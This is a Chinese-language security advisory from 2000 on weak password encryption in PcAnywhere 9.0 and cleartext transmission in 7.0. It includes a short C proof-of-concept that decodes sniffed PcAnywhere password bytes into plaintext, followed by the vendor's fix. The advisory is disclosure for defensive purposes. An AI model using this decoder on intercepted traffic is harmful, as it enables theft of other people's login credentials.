PcAnywhere 口令使用弱加密方式
发布日期:2000-04-08
更新日期:2000-04-08
受影响系统:
PcAnywhere 9.0&PcAnywhere 7.0
描述:
在缺省方式中,PcAnywhere9.0使用了很弱的加密手段保护用户名和口令在传输中不被截获。
许多用户在"空" 和 "PcAnywhere "二者之间选择一种来加密他们的口令传输。不幸的是,这是
一种很微弱的加密手段。
PCAnywhere 认证用户通过其在 NT 域上的用户名和口令,用户登陆时被要求输入其帐号,
然后再通过"PcAnywhere"的加密方法加密后传输到 NT 。使用sniffer 的攻击者能偷听到其用
户名和口令。甚至不需要使用 L0phtCrack .
7.0 的 PcAnywhere 则更本没有使用加密传输,所有的信息都是明文发送的。
<* 来源: Pascal Longpre (longprep@hotmail.com ) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#include <stdio.h>
#include <string.h>
void main() {
char password[128];
char cleartext[128];
int i;
// input the sniffed hex values here
// Encrypted example of the 'aaaaa' password
password[0]=0xca;
password[1]=0xab;
password[2]=0xcb;
password[3]=0xa8;
password[4]=0xca;
password[5]='\0';
cleartext[0]=0xca-password[0]+0x61;
for (i=1;i<strlen(password);i++)
cleartext[i] = password[i-1] ^ password[i] ^ i-1;
cleartext[strlen(password)]='\0';
printf("password is %s \n",cleartext);
}
建议:
Symantec 建议使用公开或 "Symetric"密钥方式代替。详细信息在:
http://service1.symantec.com/SUPPORT/pca.nsf/docid/1999022312571812&src=w
浏览次数:6722
严重程度:0(网友投票)